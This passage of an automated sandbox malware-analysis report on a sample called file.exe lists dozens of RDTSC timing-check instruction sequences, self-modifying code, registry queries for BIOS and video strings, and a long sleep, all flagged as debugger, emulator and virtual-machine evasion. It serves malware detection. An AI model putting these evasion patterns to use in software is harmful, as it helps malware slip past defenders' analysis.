    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC876 second address: 8DC87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E737E second address: 8E738B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F713487FC82h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E738B second address: 8E7395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7395 second address: 8E73A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F713487FC78h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E73A3 second address: 8E73A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7506 second address: 8E7525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F713487FC89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7525 second address: 8E752A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E798F second address: 8E7993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7993 second address: 8E7999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7999 second address: 8E79BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F713487FC81h 0x0000000b jbe 00007F713487FC78h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7C58 second address: 8E7C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F71347C49D6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7C68 second address: 8E7C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jc 00007F713487FC76h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8153 second address: 8E816A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F71347C49D6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E816A second address: 8E819C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC81h 0x00000007 jbe 00007F713487FC76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F713487FC83h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED090 second address: 8ED09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827811 second address: 827824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F713487FC76h 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF3B second address: 8ECF4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49DAh 0x00000007 je 00007F71347C49D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF4F second address: 8ECF69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC84h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECF69 second address: 8ECF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1A0A second address: 8F1A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F44B7 second address: 8F44DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F71347C49E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F44DA second address: 8F44DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F44DE second address: 8F44E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906EA7 second address: 906EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F713487FC82h 0x0000000b jnc 00007F713487FC76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908538 second address: 90855D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F71347C49E7h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F71347C49D6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CCC3 second address: 90CCC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91443A second address: 914468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49DCh 0x00000007 jmp 00007F71347C49E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D8F5 second address: 91D8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C042 second address: 91C046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C046 second address: 91C04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C04C second address: 91C060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C060 second address: 91C066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C066 second address: 91C06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C06C second address: 91C078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C1E6 second address: 91C1EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C783 second address: 91C7A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jng 00007F713487FC76h 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CA8B second address: 91CA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CA8F second address: 91CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F713487FC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CAA0 second address: 91CAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CAAA second address: 91CAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CAB0 second address: 91CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D517 second address: 91D549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F713487FC7Bh 0x00000010 popad 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jns 00007F713487FC76h 0x0000001b pop eax 0x0000001c jmp 00007F713487FC80h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D549 second address: 91D54E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9210F3 second address: 921104 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F713487FC7Ch 0x00000008 jnc 00007F713487FC76h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9319D2 second address: 9319DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9319DC second address: 9319E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9319E0 second address: 931A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F71347C49E6h 0x0000000c pop esi 0x0000000d push ecx 0x0000000e jns 00007F71347C49D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834E62 second address: 834E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834E66 second address: 834E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CCB9 second address: 92CCC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CCC2 second address: 92CCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F71347C49E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jc 00007F71347C49D6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CCED second address: 92CCF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FD1A second address: 93FD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jng 00007F71347C49D6h 0x0000000c jmp 00007F71347C49DEh 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FD3A second address: 93FD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F842 second address: 93F863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F71347C49D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F71347C49E1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F863 second address: 93F891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F713487FC7Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F713487FC88h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F891 second address: 93F89B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F71347C49D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F89B second address: 93F8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F8A5 second address: 93F8CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F71347C49F5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F71347C49E1h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F8CB second address: 93F8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FA12 second address: 93FA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F71347C49D6h 0x0000000a je 00007F71347C49D6h 0x00000010 jmp 00007F71347C49DFh 0x00000015 popad 0x00000016 push ebx 0x00000017 jo 00007F71347C49D6h 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jg 00007F71347C49D6h 0x00000028 push edx 0x00000029 pop edx 0x0000002a jmp 00007F71347C49DEh 0x0000002f jg 00007F71347C49D6h 0x00000035 popad 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 pushad 0x0000003a popad 0x0000003b pop edx 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942300 second address: 942304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942304 second address: 94230A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94230A second address: 94233F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F713487FC83h 0x0000000a jmp 00007F713487FC82h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F713487FC76h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94233F second address: 942343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A2DA second address: 95A2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F713487FC76h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A2E9 second address: 95A2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49DFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A2FC second address: 95A300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A300 second address: 95A31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F71347C49D8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F71347C49DCh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9591DB second address: 9591E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9594AA second address: 9594BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49DFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9597A4 second address: 9597DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F713487FC89h 0x0000000a push ebx 0x0000000b jnc 00007F713487FC76h 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F713487FC7Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9597DF second address: 9597E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BB0C second address: 95BB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F713487FC76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BB16 second address: 95BB5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F71347C49E7h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F71347C49E3h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jc 00007F71347C49E8h 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007F71347C49D6h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D2DD second address: 95D2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D2E7 second address: 95D2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49E0h 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FB6F second address: 95FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9600F0 second address: 960112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F71347C49E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F71347C49D6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9601C8 second address: 9601F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F713487FC7Dh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030C7F second address: 5030CA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F71347C4A0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F71347C49DDh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CA9 second address: 5030CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CAE second address: 5030CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CB4 second address: 5030CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 mov ah, 11h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CC7 second address: 5030D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax+00000860h] 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 pushfd 0x00000014 jmp 00007F71347C49E5h 0x00000019 adc esi, 0DEAACE6h 0x0000001f jmp 00007F71347C49E1h 0x00000024 popfd 0x00000025 popad 0x00000026 test eax, eax 0x00000028 pushad 0x00000029 mov di, cx 0x0000002c movzx ecx, dx 0x0000002f popad 0x00000030 je 00007F71A51CAA22h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dl, cl 0x0000003b mov bx, 96CCh 0x0000003f popad 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030D23 second address: 5030D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC81h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753E4 second address: 8753FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8753FF second address: 875403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8757CB second address: 8757E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F71347C49D8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6B3E09 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6B3EAA instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8936BC instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 87B841 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8F8763 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 7576Thread sleep time: -90000s >= -30000sJump to behavior
